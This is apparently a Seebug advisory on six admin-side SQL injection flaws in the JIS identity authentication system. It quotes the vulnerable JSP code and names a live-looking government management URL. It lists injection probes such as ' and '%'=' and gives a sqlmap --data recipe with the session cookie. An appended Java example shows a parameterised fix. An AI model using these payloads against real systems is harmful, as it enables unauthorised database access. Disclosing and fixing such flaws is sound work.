Multiple SQL injection vulnerabilities in the 大汉版通 JIS unified identity authentication system

2014-01-27T00:00:00
ID SSV:93880
Type seebug
Reporter Root
Modified 2014-01-27T00:00:00

Description

Brief description:

This one is just for the count. Backend SQL injection; I half suspect it is the work of an intern programmer... or a temp?

Detailed description:

Backend SQL 1. The first one is the slightly more involved case and is used for the demonstration; the rest follow the same pattern. Requires login with application administrator or system administrator privileges. /jis/manage/datasbase/que_datasbase.jsp

if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords + "%'");
}

To make this usable with a tool, first add a new listener management entry: http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

[Screenshot image025.png: https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png]

Any publicly reachable IP works, as long as the username and password are correct; otherwise it reports something like "unable to connect".

[Screenshot image027.png: https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png]

Once it has been added there is a string to use as a marker. Enter ' and '%'=' in the search box: the page does not change.

[Screenshot image029.png: https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png]

Enter ' and '1'=' and the page changes.

[Screenshot image031.png: https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png]

Take the cookie along and hand it to a tool. When configuring sqlmap's data, this form works better: --data "que_keywords=' * and '%'='"

[Screenshot image033.png: https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png]

[Screenshot image035.png: https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png]

Backend SQL 2. jis/manage/app/que_application.jsp

if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords + "%' OR vc_appmark LIKE '%" + que_keywords + "%'");
}

Same privilege requirement as above. As before, enter ' and '%'=' in the search field

[Screenshot image037.png: https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png]

' and '1'='

[Screenshot image039.png: https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png]

Tool usage is the same as for the previous one. Backend SQL 3. jis/sys/user/que_userginfo.jsp, same pattern as the previous two.

if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_usergroupname like '%" + que_keywords + "%' OR vc_groupallname like '%" + que_keywords + "%'");
}

Search for ' and '%'=' and every record is returned:

[Screenshot image041.png: https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png]

Proof of vulnerability:

Backend SQL 4. jis/manage/role/que_approleinfo.jsp

if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_rolename like '%" + que_keywords + "%'");
}
if (que_webid.length() > 0) {
    strSqlCondition.append(" AND i_webid = '" + que_webid + "'");
}

Enter ' and '%'='

[Screenshot image043.png: https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png]

' and '%'='1

[Screenshot image045.png: https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png]

Backend SQL 5. jis/manage/log/que_log.jsp

if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_operatecontent like '%" + que_keywords + "%' OR c_userid like '%" + que_keywords + "%' OR vc_modulename like '%" + que_keywords + "%' OR vc_state like '%" + que_keywords + "%' ");
}

Search for admin%' or '%'=' and all results come back:

[Screenshot image047.png: https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png]

Change it to admin%' and '%'=' and only admin's log entries appear:

[Screenshot image049.png: https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png]

Backend SQL 6. jis/manage/sysview/que_sysview.jsp, enter fgj' or '%'='

[Screenshot image051.png: https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png]
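All six findings share one defect: que_keywords is concatenated into a LIKE predicate. The following is an added example, not the vendor's code, that reproduces the que_datasbase.jsp pattern, shows why the two probes from the report behave differently, and builds the same filter as a PreparedStatement with LIKE wildcards escaped. The table name t_datasbase is an assumption; the report does not name the table.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class KeywordFilter {

    // Mirrors the vulnerable pattern from que_datasbase.jsp: the keyword is
    // spliced straight into the WHERE clause.
    static String unsafeCondition(String queKeywords) {
        StringBuilder strSqlCondition = new StringBuilder();
        if (queKeywords.length() > 0) {
            strSqlCondition.append(" AND vc_collocatename like '%" + queKeywords + "%'");
        }
        return strSqlCondition.toString();
    }

    // Escape LIKE metacharacters so a user-supplied '%' or '_' matches literally.
    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }

    // Hardened form: fixed SQL text with a '?' placeholder; the keyword travels
    // as a bind parameter and can no longer alter the shape of the query.
    static String safeCondition(String queKeywords, List<Object> params) {
        if (queKeywords.isEmpty()) return "";
        params.add("%" + escapeLike(queKeywords) + "%");
        return " AND vc_collocatename LIKE ? ESCAPE '\\'";
    }

    // t_datasbase is an assumed table name; the report does not give it.
    static PreparedStatement prepare(Connection conn, String queKeywords) throws SQLException {
        List<Object> params = new ArrayList<>();
        String sql = "SELECT * FROM t_datasbase WHERE 1=1" + safeCondition(queKeywords, params);
        PreparedStatement ps = conn.prepareStatement(sql);
        for (int i = 0; i < params.size(); i++) {
            ps.setObject(i + 1, params.get(i));
        }
        return ps;
    }

    public static void main(String[] args) {
        // The two probes from the report: the first leaves the predicate true for
        // every row, the second makes it false, hence the visible page change.
        System.out.println(unsafeCondition("' and '%'='"));
        System.out.println(unsafeCondition("' and '1'='"));
        List<Object> params = new ArrayList<>();
        System.out.println(safeCondition("' and '%'='", params) + "  params=" + params);
    }
}
```

With the parameterised version the same probe is simply searched for as a literal string, which is also the quickest regression check for each of the six query pages.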